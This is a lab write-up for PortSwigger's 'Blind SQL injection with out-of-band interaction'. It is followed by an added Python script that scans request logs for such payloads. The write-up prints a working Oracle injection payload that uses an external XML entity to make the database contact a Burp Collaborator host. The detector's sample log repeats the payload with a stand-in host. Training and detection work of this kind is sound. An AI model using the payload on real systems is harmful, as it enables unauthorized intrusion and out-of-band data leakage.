
PortSwigger: Blind SQL injection with out-of-band interaction

Blind SQL injection with out-of-band interaction

Solution

Open website: https://0ae20065048724c980de17d000d000ac.web-security-academy.net/product?productId=5

After opening the lab, I chose a random website with the product "The Trapster"

Generate Burp Collaborator subdomain

Click "Copy to clipboard"

Create payload

Add the Burp Collaborator subdomain vediw2px2s706jyohzqyegrpagg74bs0.oastify.com to the payload:
'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//vediw2px2s706jyohzqyegrpagg74bs0.oastify.com/">+%25remote%3b]>'),'/l')+FROM+dual--

Solved

Sent the request to the server
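
A defender-side view of the payload above, as an added example that is not part of the original post: it URL-decodes logged request values and alerts when a SQL XML function (xmltype / EXTRACTVALUE) carries an external entity declaration, reporting the host the database would be told to contact. The log format, the function names and the host oob.example.test are assumptions constructed for this example.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# SQL-side XML parsing functions seen in the payload on this page.
XML_FUNCS = re.compile(r"\b(?:xmltype|extractvalue)\s*\(", re.IGNORECASE)
# An entity declaration (general or parameter) that points at an external URL.
EXT_ENTITY = re.compile(
    r"<!ENTITY\s+(?:%\s+)?\w+\s+SYSTEM\s+[\"']([^\"']+)[\"']", re.IGNORECASE)


def inspect_value(raw):
    """Decode one logged request value and report out-of-band indicators."""
    decoded = unquote_plus(raw)
    urls = EXT_ENTITY.findall(decoded)
    hosts = sorted({urlsplit(u).hostname for u in urls if urlsplit(u).hostname})
    xml_in_sql = bool(XML_FUNCS.search(decoded))
    return {
        "xml_in_sql": xml_in_sql,
        "callback_hosts": hosts,
        # Alert only when both halves are present, to avoid flagging plain XML.
        "alert": xml_in_sql and bool(hosts),
    }


# Constructed log lines (assumed format): "<client-ip> <raw value as received>".
SAMPLE_LOG = [
    "198.51.100.10 5",
    "198.51.100.11 The+Trapster",
    "203.0.113.7 '+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d\"1.0\"+"
    "encoding%3d\"UTF-8\"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"
    "\"http%3a//oob.example.test/\">+%25remote%3b]>'),'/l')+FROM+dual--",
]


def scan(lines):
    """Return (client_ip, callback_hosts) for every line that raises an alert."""
    hits = []
    for line in lines:
        ip, _, raw = line.partition(" ")
        result = inspect_value(raw)
        if result["alert"]:
            hits.append((ip, result["callback_hosts"]))
    return hits


if __name__ == "__main__":
    for ip, hosts in scan(SAMPLE_LOG):
        print(f"ALERT {ip}: SQL-embedded XML fetches {', '.join(hosts)}")
```

The extracted callback hosts can be compared against DNS and egress logs from the database tier, which should normally have no reason to resolve external names.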